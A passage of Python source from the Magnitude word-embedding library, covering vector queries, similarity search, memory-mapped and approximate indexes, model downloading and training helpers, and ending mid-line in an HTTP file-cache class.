@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def query(self, q, pad_to_length=None,
pad_left=None, truncate_left=None,
normalized=None):
"""Handles a query of keys which could be a single key, a
1-D list of keys, or a 2-D list of keys.
"""
normalized = normalized if normalized is not None else self.normalized
pad_to_length = pad_to_length or self.pad_to_length
pad_left = pad_left or self.pad_left
truncate_left = truncate_left or self.truncate_left
if not isinstance(q, list): # Single key
vec = self._vector_for_key_cached(q, normalized=normalized)
if vec is None:
return self._out_of_vocab_vector_cached(q, normalized=normalized)
else:
return vec
elif isinstance(q, list) \
and (len(q) == 0 or not isinstance(q[0], list)): # 1D list
pad_to_length = pad_to_length if pad_to_length else len(q)
padding_length = max(pad_to_length - len(q), 0)
keys_length = pad_to_length - padding_length
vectors = self._vectors_for_keys_cached(q, normalized)
if truncate_left:
vectors = vectors[-keys_length:]
else:
vectors = vectors[0:keys_length]
if self.use_numpy:
tensor = np.zeros((pad_to_length, self.dim), dtype=self.dtype)
else:
tensor = [self._padding_vector() for i in range(pad_to_length)]
if pad_left:
tensor[-keys_length:] = vectors
else:
tensor[0:keys_length] = vectors
return tensor
elif isinstance(q, list): # 2D List
max_q = max([len(subquery) for subquery in q])
pad_to_length = pad_to_length if pad_to_length else max_q
if self.use_numpy:
tensor = np.zeros((len(q), pad_to_length, self.dim),
dtype=self.dtype)
else:
tensor = [[self._padding_vector() for i in range(pad_to_length)]
for j in range(len(q))]
for row, vectors in \
enumerate(self._vectors_for_2d_keys(q, normalized)):
padding_length = max(pad_to_length - len(vectors), 0)
keys_length = pad_to_length - padding_length
if truncate_left:
vectors = vectors[-keys_length:]
else:
vectors = vectors[0:keys_length]
if pad_left:
if self.use_numpy:
tensor[row, -keys_length:] = vectors
else:
tensor[row][-keys_length:] = vectors
else:
if self.use_numpy:
tensor[row, 0:keys_length] = vectors
else:
tensor[row][0:keys_length] = vectors
return tensor
def unroll(self, v):
""" Unrolls a vector if it was concatenated from its base model
form. """
if self.elmo and isinstance(v, np.ndarray):
return unroll_elmo(v, self.placeholders)
else:
return v
def index(self, q, return_vector=True):
"""Gets a key for an index or multiple indices."""
if isinstance(q, list) or isinstance(q, tuple):
return self._keys_for_indices(q, return_vector=return_vector)
else:
return self._key_for_index_cached(q, return_vector=return_vector)
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def _query_numpy(self, key, contextualize=False, normalized=None):
"""Returns the query for a key, forcibly converting the
resulting vector to a numpy array.
"""
normalized = normalized if normalized is not None else self.normalized
if contextualize:
key = [[sq] for sq in key]
key_is_ndarray = isinstance(key, np.ndarray)
key_is_list = isinstance(key, list)
key_len_ge_0 = key_is_list and len(key) > 0
key_0_is_number = key_len_ge_0 and isinstance(key[0], Number)
key_0_is_ndarray = key_len_ge_0 and isinstance(key[0], np.ndarray)
key_0_is_list = key_len_ge_0 and isinstance(key[0], list)
key_0_len_ge_0 = key_0_is_list and len(key[0]) > 0
key_0_0_is_number = (key_0_is_list and key_0_len_ge_0 and
isinstance(key[0][0], Number))
r_val = None
if (key_is_ndarray or key_0_is_number or key_0_is_ndarray or key_0_0_is_number): # noqa
r_val = key
elif not self.use_numpy:
r_val = np.asarray(self.query(key, normalized=normalized))
else:
r_val = self.query(key, normalized=normalized)
if contextualize:
return np.squeeze(r_val, axis=1)
else:
return r_val
def _query_cached(self, key, normalized=None, force=False):
"""Checks if the query been cached by Magnitude."""
normalized = normalized if normalized is not None else self.normalized
cached = self._vector_for_key_cached._cache.get(((key,), frozenset([('normalized', normalized)])))
if cached is not None:
return cached
return self._out_of_vocab_vector_cached._cache.get(((key,), frozenset([('normalized', normalized), ('force', force)])))
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def distance(self, key, q):
"""Calculates the distance from key to the key(s) in q."""
a = self._query_numpy(key, normalized=self.normalized)
if not isinstance(q, list):
b = self._query_numpy(q, normalized=self.normalized)
return np.linalg.norm(a - b)
else:
return [
np.linalg.norm(
a -
b) for b in self._query_numpy(
q,
contextualize=True,
normalized=self.normalized)]
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def similarity(self, key, q):
"""Calculates the similarity from key to the key(s) in q."""
a = self._query_numpy(key, normalized=True)
if not isinstance(q, list):
b = self._query_numpy(q, normalized=True)
return np.inner(a, b) / (np.linalg.norm(a) * np.linalg.norm(b))
else:
return [np.inner(a, b) / (np.linalg.norm(a) * np.linalg.norm(b))
for b in self._query_numpy(q,
contextualize=True,
normalized=True)]
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def most_similar_to_given(self, key, q):
"""Calculates the most similar key in q to key."""
similarities = self.similarity(key, q)
max_index, _ = max(enumerate(similarities), key=operator.itemgetter(1))
return q[max_index]
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def doesnt_match(self, q):
"""Given a set of keys, figures out which key doesn't
match the rest.
"""
mean_vector = np.mean(self._query_numpy(
q, contextualize=True, normalized=True), axis=0)
mean_unit_vector = mean_vector / np.linalg.norm(mean_vector)
distances = [
np.linalg.norm(
mean_unit_vector - b
)
for b in self._query_numpy(q, contextualize=True, normalized=True)]
max_index, _ = max(enumerate(distances), key=operator.itemgetter(1))
return q[max_index]
def _db_query_similarity(
self,
positive,
negative,
min_similarity=None,
topn=10,
exclude_keys=set(),
return_similarities=False,
method='distance',
effort=1.0):
"""Runs a database query to find vectors close to vector."""
COSMUL = method == '3cosmul' # noqa: N806
APPROX = method == 'approx' # noqa: N806
DISTANCE = not COSMUL and not APPROX # noqa: N806
exclude_keys = {self._key_t(exclude_key)
for exclude_key in exclude_keys}
if topn is None:
topn = self.length
filter_topn = self.max_duplicate_keys * (topn + len(exclude_keys))
# Find mean unit vector
if (DISTANCE or APPROX) and (len(negative) > 0 or len(positive) > 1):
positive_vecs = np.sum(
self._query_numpy(
positive,
contextualize=True,
normalized=True),
axis=0)
if len(negative) > 0:
negative_vecs = -1.0 * \
np.sum(self._query_numpy(
negative,
contextualize=True,
normalized=True),
axis=0)
else:
negative_vecs = np.zeros((self.dim,), dtype=self.dtype)
mean_vector = (positive_vecs + negative_vecs) / \
float(len(positive) + len(negative))
mean_unit_vector = mean_vector / np.linalg.norm(mean_vector)
elif (DISTANCE or APPROX):
mean_unit_vector = self._query_numpy(
positive[0], normalized=True)
elif COSMUL:
positive_vecs = self._query_numpy(
positive, contextualize=True, normalized=True)
if len(negative) > 0:
negative_vecs = self._query_numpy(
negative, contextualize=True, normalized=True)
else:
negative_vecs = np.zeros((0, self.dim))
# Calculate topn closest in batches over all vectors
if DISTANCE or COSMUL:
filtered_indices = []
for batch_start, _, batch in \
self.get_vectors_mmap_batch_generator():
if DISTANCE:
similiarities = np.dot(batch, mean_unit_vector)
elif COSMUL:
positive_similiarities = [
((1 + np.dot(batch, vec)) / 2)
for vec in positive_vecs
]
negative_similiarities = [
((1 + np.dot(batch, vec)) / 2)
for vec in negative_vecs
]
similiarities = (
np.prod(positive_similiarities, axis=0) /
(np.prod(negative_similiarities, axis=0) + 0.000001))
partition_results = np.argpartition(similiarities, -1 * min(
filter_topn, self.batch_size, self.length))[-filter_topn:]
for index in partition_results:
if (min_similarity is None or
similiarities[index] >= min_similarity):
if len(filtered_indices) < filter_topn:
heapq.heappush(filtered_indices, (
similiarities[index],
batch_start + index))
elif similiarities[index] > filtered_indices[0][0]:
heapq.heappushpop(filtered_indices, (
similiarities[index],
batch_start + index))
# Get the final topn from all batches
topn_indices = heapq.nlargest(filter_topn, filtered_indices,
key=lambda x: x[0])
topn_indices = iter(topn_indices)
elif APPROX:
approx_index = self.get_approx_index()
search_k = int(effort * filter_topn * self.approx_trees)
nns = approx_index.get_nns_by_vector(
mean_unit_vector,
filter_topn,
search_k=search_k,
include_distances=True)
topn_indices = izip(nns[1], nns[0])
topn_indices = imap(lambda di: (1 - di[0] ** 2 * .5, di[1]),
topn_indices)
# Tee topn_indices iterator
topn_indices_1, topn_indices_2 = tee(topn_indices)
# Retrieve the keys of the vectors
keys = self.index([i[1] for i in topn_indices_1],
return_vector=False)
# Build the result
results = []
for key, similarity in izip(keys, topn_indices_2):
key_t = self._key_t(key)
if len(results) >= topn:
break
if key_t in exclude_keys:
continue
exclude_keys.add(key_t)
if return_similarities:
results.append((key, similarity[0]))
else:
results.append(key)
return results
def _handle_pos_neg_args(self, positive, negative):
if not isinstance(
positive,
list) or (
len(positive) > 0 and isinstance(
positive[0],
Number)):
positive = [positive]
if not isinstance(
negative,
list) or (
len(negative) > 0 and isinstance(
negative[0],
Number)):
negative = [negative]
return positive, negative
def _exclude_set(self, positive, negative):
def _is_vec(elem):
return isinstance(elem, np.ndarray) or \
(isinstance(elem, list) and len(elem) > 0 and
isinstance(elem[0], Number))
return frozenset((elem for elem in chain.from_iterable(
[positive, negative]) if not _is_vec(elem)))
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def most_similar(self, positive, negative=[], topn=10, min_similarity=None,
return_similarities=True):
"""Finds the topn most similar vectors under or equal
to max distance.
"""
positive, negative = self._handle_pos_neg_args(positive, negative)
return self._db_query_similarity(
positive=positive,
negative=negative,
min_similarity=min_similarity,
topn=topn,
exclude_keys=self._exclude_set(
positive,
negative),
return_similarities=return_similarities,
method='distance')
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def most_similar_cosmul(self, positive, negative=[], topn=10,
min_similarity=None, return_similarities=True):
"""Finds the topn most similar vectors under or equal to max
distance using 3CosMul:
[Levy and Goldberg](http://www.aclweb.org/anthology/W14-1618)
"""
positive, negative = self._handle_pos_neg_args(positive, negative)
results = self._db_query_similarity(
positive=positive,
negative=negative,
min_similarity=min_similarity,
topn=topn,
exclude_keys=self._exclude_set(
positive,
negative),
return_similarities=return_similarities,
method='3cosmul')
return results
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def most_similar_approx(
self,
positive,
negative=[],
topn=10,
min_similarity=None,
return_similarities=True,
effort=1.0):
"""Approximates the topn most similar vectors under or equal to max
distance using Annoy:
https://github.com/spotify/annoy
"""
if not self.approx:
raise RuntimeError("The `.magnitude` file you are using does not \
support the `most_similar_approx` function. If you are using a pre-built \
`.magnitude` file, visit Magnitude's git repository page's README and download \
the 'Heavy' model instead. If you converted this `.magnitude` file yourself \
you will need to re-convert the file passing the `-a` flag to the converter to \
build the appropriate indexes into the `.magnitude` file.")
positive, negative = self._handle_pos_neg_args(positive, negative)
effort = min(max(0, effort), 1.0)
results = self._db_query_similarity(
positive=positive,
negative=negative,
min_similarity=min_similarity,
topn=topn,
exclude_keys=self._exclude_set(
positive,
negative),
return_similarities=return_similarities,
method='approx',
effort=effort)
return results
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def closer_than(self, key, q, topn=None):
"""Finds all keys closer to key than q is to key."""
epsilon = (10.0 / 10**6)
min_similarity = self.similarity(key, q) + epsilon
return self.most_similar(key, topn=topn, min_similarity=min_similarity,
return_similarities=False)
def get_vectors_mmap(self, log=True):
"""Gets a numpy.memmap of all vectors, blocks if it is still
being built.
"""
if self._all_vectors is None:
logged = False
while True:
if not self.setup_for_mmap:
self._setup_for_mmap()
try:
if not self.memory_db and self.length > 0:
all_vectors = np.memmap(
self.path_to_mmap, dtype=self.dtype, mode='r',
shape=(self.length, self.dim))
self._all_vectors = all_vectors
else:
all_vectors = np.zeros((0, self.dim))
self._all_vectors = all_vectors
break
except BaseException:
if not logged and log and self.log:
_log("Need to build a memory map. "
"This may take some time...but it only "
"needs to be done once (even between "
"multiple runs of this program). The result"
" will get stashed into a temporary "
"directory on your "
"computer.")
path_to_mmap_temp = self.path_to_mmap + '.tmp'
tlock = self.MMAP_THREAD_LOCK.acquire(False)
plock = self.MMAP_PROCESS_LOCK.acquire(0)
if tlock and plock:
values = imap(
lambda kv: kv[1], self._iter(
put_cache=self.lazy_loading == -1,
downloader=True))
try:
with open(path_to_mmap_temp, "w+b") as mmap_file:
all_vectors = np.memmap(
mmap_file, dtype=self.dtype, mode='w+',
shape=(self.length, self.dim))
last_p = 0
for i, value in enumerate(values):
progress = round((float(i) / float(self.length)) * 100, 2) # noqa
if log and self.log and int(progress) > last_p: # noqa
last_p = int(progress)
_log("Progress: %.2f%%" %
(progress,))
all_vectors[i] = value
all_vectors.flush()
try:
del all_vectors
except BaseException:
pass
if not self.closed:
os.rename(path_to_mmap_temp, self.path_to_mmap)
else:
return
finally:
self.MMAP_THREAD_LOCK.release()
try:
self.MMAP_PROCESS_LOCK.release()
except BaseException:
pass
sleep(1) # Block before trying again
return self._all_vectors
def get_vectors_mmap_batch_generator(self):
"""Gets batches of get_vectors_mmap()."""
all_vectors = self.get_vectors_mmap()
if self.length > self.batch_size:
for i in range(all_vectors.shape[0]):
batch_start = i * self.batch_size
batch_end = min(batch_start + self.batch_size,
all_vectors.shape[0])
if batch_start >= all_vectors.shape[0]:
break
yield (batch_start, batch_end,
all_vectors[batch_start:batch_end])
if batch_end == all_vectors.shape[0]:
break
else:
yield (0, self.length, all_vectors)
def get_approx_index_chunks(self):
"""Gets decompressed chunks of the AnnoyIndex of the vectors from
the database."""
try:
db = self._db(force_new=True, downloader=True)
num_chunks = db.execute(
"""
SELECT COUNT(rowid)
FROM `magnitude_approx`
WHERE trees = ?
""", (self.approx_trees,)).fetchall()[0][0]
with lz4.frame.LZ4FrameDecompressor() as decompressor:
chunks = db.execute(
"""
SELECT rowid,index_file
FROM `magnitude_approx`
WHERE trees = ?
""", (self.approx_trees,))
for chunk in chunks:
yield num_chunks, decompressor.decompress(chunk[1])
if self.closed:
return
except Exception as e:
if self.closed:
pass
else:
raise e
def get_meta_chunks(self, meta_index):
"""Gets decompressed chunks of a meta file embedded in
the database."""
try:
db = self._db(force_new=True, downloader=True)
num_chunks = db.execute(
"""
SELECT COUNT(rowid)
FROM `magnitude_meta_""" + str(meta_index) + """`
""").fetchall()[0][0]
with lz4.frame.LZ4FrameDecompressor() as decompressor:
chunks = db.execute(
"""
SELECT rowid,meta_file
FROM `magnitude_meta_""" + str(meta_index) + """`
""")
for chunk in chunks:
yield num_chunks, decompressor.decompress(chunk[1])
if self.closed:
return
except Exception as e:
if self.closed:
pass
else:
raise e
def get_approx_index(self, log=True):
"""Gets an AnnoyIndex of the vectors from the database."""
chunks = self.get_approx_index_chunks()
if self._approx_index is None:
logged = False
while True:
if not self.setup_for_mmap:
self._setup_for_mmap()
try:
sys.stdout.flush()
sys.stderr.flush()
approx_index = AnnoyIndex(self.emb_dim, metric='angular')
approx_index.load(self.path_to_approx_mmap)
self._approx_index = approx_index
break
except BaseException:
sys.stdout.flush()
sys.stderr.flush()
if not logged and log and self.log:
_log("Need to build the approximate index."
" This may take some time...but it only "
"needs to be done once (even between "
"multiple runs of this program). The result"
" will get stashed into a temporary "
"directory on your "
"computer.")
path_to_approx_mmap_temp = self.path_to_approx_mmap \
+ '.tmp'
tlock = self.APPROX_MMAP_THREAD_LOCK.acquire(False)
plock = self.APPROX_MMAP_PROCESS_LOCK.acquire(0)
if tlock and plock:
try:
with open(path_to_approx_mmap_temp, "w+b") \
as mmap_file:
last_p = 0
for i, (length, chunk) in enumerate(chunks):
progress = round((float(i) / float(length)) * 100, 2) # noqa
if log and self.log and int(progress) > last_p: # noqa
last_p = int(progress)
_log("Progress: %.2f%%" %
(progress,))
mmap_file.write(chunk)
if not self.closed:
os.rename(path_to_approx_mmap_temp,
self.path_to_approx_mmap)
else:
return
finally:
self.APPROX_MMAP_THREAD_LOCK.release()
try:
self.APPROX_MMAP_PROCESS_LOCK.release()
except BaseException:
pass
sleep(1) # Block before trying again
return self._approx_index
def get_elmo_embedder(self, log=True):
"""Gets an ElmoEmbedder of the vectors from the database."""
meta_1_chunks = self.get_meta_chunks(1)
meta_2_chunks = self.get_meta_chunks(2)
if self._elmo_embedder is None:
logged = False
while True:
if not self.setup_for_mmap:
self._setup_for_mmap()
try:
if len(self.devices) > 0:
elmo_embedder = ElmoEmbedder(
self.path_to_elmo_o_mmap, self.path_to_elmo_w_mmap,
cuda_device=self.devices[0])
else:
elmo_embedder = ElmoEmbedder(
self.path_to_elmo_o_mmap, self.path_to_elmo_w_mmap)
self._elmo_embedder = elmo_embedder
break
except BaseException:
if not logged and log and self.log:
_log("Need to build ElmoEmbedder. "
"This may take some time...but it only "
"needs to be done once (even between "
"multiple runs of this program). The result"
" will get stashed into a temporary "
"directory on your "
"computer.")
path_to_elmo_w_mmap_temp = self.path_to_elmo_w_mmap \
+ '.tmp'
path_to_elmo_o_mmap_temp = self.path_to_elmo_o_mmap \
+ '.tmp'
tlock_w = self.ELMO_W_MMAP_THREAD_LOCK.acquire(False)
plock_w = self.ELMO_W_MMAP_PROCESS_LOCK.acquire(0)
tlock_o = self.ELMO_O_MMAP_THREAD_LOCK.acquire(False)
plock_o = self.ELMO_O_MMAP_PROCESS_LOCK.acquire(0)
if tlock_w and plock_w and tlock_o and plock_o:
try:
with open(path_to_elmo_w_mmap_temp, "w+b") \
as mmap_file:
last_p = 0
for i, (length, chunk) \
in enumerate(meta_1_chunks):
progress = round((float(i) / float(length)) * 100, 2) # noqa
if log and self.log and int(progress) > last_p: # noqa
last_p = int(progress)
_log("Progress: %.2f%%" %
(progress,))
mmap_file.write(chunk)
if not self.closed:
os.rename(path_to_elmo_w_mmap_temp,
self.path_to_elmo_w_mmap)
else:
return
with open(path_to_elmo_o_mmap_temp, "w+b") \
as mmap_file:
for _, chunk in meta_2_chunks:
mmap_file.write(chunk)
if not self.closed:
os.rename(path_to_elmo_o_mmap_temp,
self.path_to_elmo_o_mmap)
else:
return
finally:
self.ELMO_W_MMAP_THREAD_LOCK.release()
try:
self.ELMO_W_MMAP_PROCESS_LOCK.release()
except BaseException:
pass
self.ELMO_O_MMAP_THREAD_LOCK.release()
try:
self.ELMO_O_MMAP_PROCESS_LOCK.release()
except BaseException:
pass
sleep(1) # Block before trying again
return self._elmo_embedder
def _iter(self, put_cache, downloader=False):
"""Yields keys and vectors for all vectors in the store."""
try:
db = self._db(force_new=True, downloader=downloader)
results = db.execute(
"""
SELECT *
FROM `magnitude`
""")
for result in results:
yield self._db_full_result_to_vec(result, put_cache=put_cache)
if self.closed:
return
except Exception as e:
if self.closed:
pass
else:
raise e
def __iter__(self):
"""Yields keys and vectors for all vectors in the store."""
return self._iter(put_cache=True)
def __len__(self):
"""Returns the number of vectors."""
return self.length
def __contains__(self, key):
"""Checks whether a key exists in the vectors"""
return self._vector_for_key_cached(key, normalized=self.normalized) is not None
def __getitem__(self, q):
"""Performs the index method when indexed."""
if isinstance(q, slice):
return self.index(list(range(*q.indices(self.length))),
return_vector=True)
else:
return self.index(q, return_vector=True)
def close(self):
"""Cleans up the object"""
self.closed = True
while any([t.is_alive() for t in self._threads]):
sleep(.5)
for conn in self._all_conns:
try:
conn.close()
except Exception:
pass
if hasattr(self, 'fd'):
try:
os.close(self.fd)
except BaseException:
pass
try:
self._all_vectors._mmap.close()
except BaseException:
pass
try:
del self._all_vectors
gc.collect()
except BaseException:
pass
try:
self._approx_index.unload()
except BaseException:
pass
if (hasattr(self, 'MMAP_PROCESS_LOCK') and
hasattr(self.MMAP_PROCESS_LOCK, 'lockfile') and
self.MMAP_PROCESS_LOCK.lockfile is not None):
try:
self.MMAP_PROCESS_LOCK.lockfile.close()
except BaseException:
pass
if (hasattr(self, 'APPROX_MMAP_PROCESS_LOCK') and
hasattr(self.APPROX_MMAP_PROCESS_LOCK, 'lockfile') and
self.APPROX_MMAP_PROCESS_LOCK.lockfile is not None):
try:
self.APPROX_MMAP_PROCESS_LOCK.lockfile.close()
except BaseException:
pass
if (hasattr(self, 'ELMO_W_MMAP_PROCESS_LOCK') and
hasattr(self.ELMO_W_MMAP_PROCESS_LOCK, 'lockfile') and
self.ELMO_W_MMAP_PROCESS_LOCK.lockfile is not None):
try:
self.ELMO_W_MMAP_PROCESS_LOCK.lockfile.close()
except BaseException:
pass
if (hasattr(self, 'ELMO_O_MMAP_PROCESS_LOCK') and
hasattr(self.ELMO_O_MMAP_PROCESS_LOCK, 'lockfile') and
self.ELMO_O_MMAP_PROCESS_LOCK.lockfile is not None):
try:
self.ELMO_O_MMAP_PROCESS_LOCK.lockfile.close()
except BaseException:
pass
def __del__(self):
""" Destructor for the class """
try:
self.close()
except BaseException:
pass
class FeaturizerMagnitude(Magnitude):
"""A FeaturizerMagnitude class that subclasses Magnitude and acts as
a way to featurize arbitrary Python objects directly into vectors.
Attributes:
number_of_values: number_of_values should be set to the
approximate upper-bound of the number of
feature values that will be looked up with query().
If you don't know the exact number, be conservative
and pick a large number, while keeping in mind the
bigger number_of_values is, the more memory it will
consume
namespace: an optional namespace that will be prepended to each query
if provided
"""
def __init__(self, number_of_values=1000000, namespace=None, **kwargs):
self.namespace = namespace
super(
FeaturizerMagnitude,
self).__init__(
None,
_number_of_values=number_of_values,
_namespace=self.namespace,
**kwargs)
class ConcatenatedMagnitude(object):
"""A ConcatenatedMagnitude class that acts as a concatenated interface
to querying multiple magnitude objects.
Attributes:
*args: each arg should be a Magnitude object
"""
def __init__(self, *args, **kwargs):
if len(args) < 2:
raise RuntimeError(
"Must concatenate at least 2 Magnitude objects.")
self.magnitudes = args
self.dim = sum([m.dim for m in self.magnitudes])
all_use_numpy = [m.use_numpy for m in self.magnitudes]
if not all(use_numpy == all_use_numpy[0]
for use_numpy in all_use_numpy):
raise RuntimeError(
"All magnitude objects must have the same use_numpy value.")
self.use_numpy = all_use_numpy[0]
def _take(self, q, multikey, i):
"""Selects only the i'th element from the inner-most axis and
reduces the dimensions of the tensor q by 1.
"""
if multikey == -1:
return q
else:
cut = np.take(q, [i], axis=multikey)
result = np.reshape(cut, np.shape(cut)[0:-1]).tolist()
return result
def _hstack(self, l, use_numpy):
"""Horizontally stacks NumPy arrays or Python lists"""
if use_numpy:
return np.concatenate(l, axis=-1)
else:
return list(chain.from_iterable(l))
def _dstack(self, l, use_numpy):
"""Depth stacks NumPy arrays or Python lists"""
if use_numpy:
return np.concatenate(l, axis=-1)
else:
return [self._hstack((l3[example] for l3 in l),
use_numpy=use_numpy) for example in xrange(len(l[0]))] # noqa
@lru_cache(DEFAULT_LRU_CACHE_SIZE, ignore_unhashable_args=True)
def query(self, q, pad_to_length=None,
pad_left=None, truncate_left=None,
normalized=None):
"""Handles a query of keys which could be a single key, a
1-D list of keys, or a 2-D list of keys.
"""
# Check if keys are specified for each concatenated model
multikey = -1
if isinstance(q, tuple):
multikey = 0
if isinstance(q, list) and isinstance(q[0], tuple):
multikey = 1
if (isinstance(q, list) and isinstance(q[0], list) and
isinstance(q[0][0], tuple)):
multikey = 2
# Define args
pad_to_length = pad_to_length or self.magnitudes[0].pad_to_length
pad_left = pad_left or self.magnitudes[0].pad_left
truncate_left = truncate_left or self.magnitudes[0].truncate_left
# Query each model with the right set of keys
v = [m.query(self._take(q, multikey, i), normalized=(
normalized if normalized is not None else m.normalized
))
for i, m in enumerate(self.magnitudes)]
if not isinstance(q, list): # Single key
return self._hstack(v, self.use_numpy)
elif isinstance(q, list) \
and (len(q) == 0 or not isinstance(q[0], list)): # 1D list
return self._hstack(v, self.use_numpy)
elif isinstance(q, list): # 2D List
return self._dstack(v, self.use_numpy)
class MagnitudeUtils(object):
"""A MagnitudeUtils class that contains static helper utilities."""
@staticmethod
def download_model(
model,
download_dir=os.path.expanduser('~/.magnitude/'),
remote_path='http://magnitude.plasticity.ai/',
log=False,
_download=True,
_local=False):
""" Downloads a remote Magnitude model locally (if it doesn't already
exist) and synchronously returns the local file path once it has
been completed """
# Clean the inputs
orig_model = model
if model.endswith('.magnitude'):
model = model[:-10]
if model.startswith('http://') or model.startswith('https://'):
remote_path = ''
if model.startswith('http://magnitude.plasticity.ai/'):
model = model.replace('http://magnitude.plasticity.ai/', '')
remote_path = 'http://magnitude.plasticity.ai/'
if model.startswith('https://magnitude.plasticity.ai/'):
model = model.replace('https://magnitude.plasticity.ai/', '')
remote_path = 'https://magnitude.plasticity.ai/'
if not remote_path.endswith('/') and len(remote_path) > 0:
remote_path = remote_path + '/'
# Local download
local_file_name = model.replace('/', '_') + '.magnitude'
local_file_name_tmp = model.replace('/', '_') + '.magnitude.tmp'
remote_file_path = remote_path + model + '.magnitude'
if not _download:
return remote_file_path
# Make the download directories
try:
os.makedirs(download_dir)
except OSError:
if not os.path.isdir(download_dir):
raise RuntimeError("The download folder is not a folder.")
if not os.path.isfile(os.path.join(download_dir, local_file_name)):
try:
if log:
_log("Downloading '.magnitude' file..."
"this may take some time. If you want "
"to stream the model, pass stream=True "
"to the Magnitude constructor instead."
"This only needs to happen once.")
urlretrieve(
remote_file_path,
os.path.join(download_dir, local_file_name_tmp)
)
conn = sqlite3.connect(
os.path.join(
download_dir,
local_file_name_tmp))
conn.cursor().execute("SELECT * FROM magnitude_format")
conn.close()
os.rename(
os.path.join(
download_dir,
local_file_name_tmp),
os.path.join(
download_dir,
local_file_name))
except BaseException:
if _local:
raise RuntimeError(
"The path to the Magnitude file at '" + orig_model + "' could not be found. Also failed to find a valid remote model at the following URL: " + # noqa
remote_file_path)
else:
raise RuntimeError(
"The download could not be completed. Are you sure a valid model exists at the following URL: " + # noqa
remote_file_path)
return os.path.join(download_dir, local_file_name)
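# A minimal sketch of the download helper above; the model name is
# illustrative. The file is fetched from remote_path into download_dir on
# the first call, and the cached local path is returned on later calls.
#
#   path = MagnitudeUtils.download_model("word2vec/medium/GoogleNews-vectors-negative300")
#   vectors = Magnitude(path)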
@staticmethod
def batchify(X, y, batch_size): # noqa: N803
""" Creates an iterator that chunks `X` and `y` into batches
that each contain `batch_size` elements and loops forever"""
X_batch_generator = cycle([X[i: i + batch_size] # noqa: N806
for i in xrange(0, len(X), batch_size)])
y_batch_generator = cycle([y[i: i + batch_size]
for i in xrange(0, len(y), batch_size)])
return izip(X_batch_generator, y_batch_generator)
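# A small illustration of batchify (values are arbitrary). The iterator
# cycles forever, so a training loop typically calls next() a fixed number
# of times per epoch.
#
#   X = [[1], [2], [3], [4], [5]]
#   y = [0, 1, 0, 1, 0]
#   batches = MagnitudeUtils.batchify(X, y, 2)
#   next(batches)   # ([[1], [2]], [0, 1])
#   next(batches)   # ([[3], [4]], [0, 1])
#   next(batches)   # ([[5]], [0]), then wraps around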
@staticmethod
def class_encoding():
"""Creates a set of functions to add a new class, convert a
class into an integer, and the integer back to a class."""
class_to_int_map = {}
int_to_class_map = None
def add_class(c):
global int_to_class_map
int_to_class_map = None
return class_to_int_map.setdefault(
c, len(class_to_int_map))
def class_to_int(c):
return class_to_int_map[c]
def int_to_class(i):
global int_to_class_map
if int_to_class_map is None:
int_to_class_map = {v: k
for k, v in (
(
hasattr(class_to_int_map, 'iteritems') and # noqa
class_to_int_map.iteritems
) or
class_to_int_map.items
)()}
return int_to_class_map[i]
return add_class, class_to_int, int_to_class
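# A small illustration of the closures returned by class_encoding
# (the label strings are arbitrary):
#
#   add_class, class_to_int, int_to_class = MagnitudeUtils.class_encoding()
#   add_class("positive")      # -> 0
#   add_class("negative")      # -> 1
#   class_to_int("negative")   # -> 1
#   int_to_class(0)            # -> "positive"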
@staticmethod
def to_categorical(y, num_classes=None):
"""Converts a class vector (integers) to binary class matrix.
"""
y = np.array(y, dtype='int')
input_shape = y.shape
if input_shape and input_shape[-1] == 1 and len(input_shape) > 1:
input_shape = tuple(input_shape[:-1])
y = y.ravel()
if not num_classes:
num_classes = np.max(y) + 1
n = y.shape[0]
categorical = np.zeros((n, num_classes), dtype=np.float32)
categorical[np.arange(n), y] = 1
output_shape = input_shape + (num_classes,)
categorical = np.reshape(categorical, output_shape)
return categorical
@staticmethod
def from_categorical(categorical):
"""Converts a binary class matrix to a class vector (integers)"""
return np.argmax(categorical, axis=1)
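# A worked example of the one-hot round trip above:
#
#   MagnitudeUtils.to_categorical([0, 2, 1], num_classes=3)
#   # -> array([[1., 0., 0.],
#   #           [0., 0., 1.],
#   #           [0., 1., 0.]], dtype=float32)
#   MagnitudeUtils.from_categorical([[1., 0., 0.], [0., 0., 1.]])
#   # -> array([0, 2])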
if _APSW_LIB == 'internal':
class HTTPVFSFileCache():
""" This cache sort of acts like a predictor for sequential
network reads. It proactively pulls in more data than
requested from the network if it sees a pattern of sequential
reads. The amount of data predictively pulled is
adjusted based on the last few true sequential reads.
"""
def __init__(self, vfsfile):
self.vfsfile = vfsfile
self.cache_size = None
self._start_offset = 0
self.running_hit_direction = 0
self.running_hit_last_start = float("inf")
self.running_hit_last_end = 0
self.running_forward_hit_amount = 0
self.running_backward_hit_amount = 0
self.running_hit_amount = 0
self.time = time.time()
self.id = uuid.uuid4().int
self.data = "".encode('utf-8')
def length_of_data(self):
"""Returns the length of the cached data."""
return len(self.data)
def get_data(self):
"""Returns the cached data."""
return self.data
def set_data(self, data):
"""Sets the cached data."""
self.data = data
def add_to_caches(self):
"""Adds self to the caches."""
self.vfsfile.caches.append(self)
def save_cache(self):
"""Saves the cache."""
pass
def delete_caches(self):
"""Deletes old caches."""
current_time = time.time()
self.vfsfile.caches = [
cache for cache in self.vfsfile._get_caches() if (
current_time - cache.time) <= self.vfsfile.cache_ttl]
def get_cache(self, amount, offset):
"""Checks if a cache exists for the data offset, and amount to read,
if so, return the cache, and the start and end range to read
from the cache's data.
Keeps track of forward sequential reads, and backward
sequential reads for the cache.
"""
return_val = [None, None, None, None, None, None, None]
measure_cache_size = self.cache_size is None
if measure_cache_size:
self.cache_size = 0
for c in self.vfsfile._get_caches():
if measure_cache_size:
self.cache_size += c.length_of_data()
start = offset - c._start_offset
end = start + amount
close_to_last_end = (
abs(start - c.running_hit_last_end) <
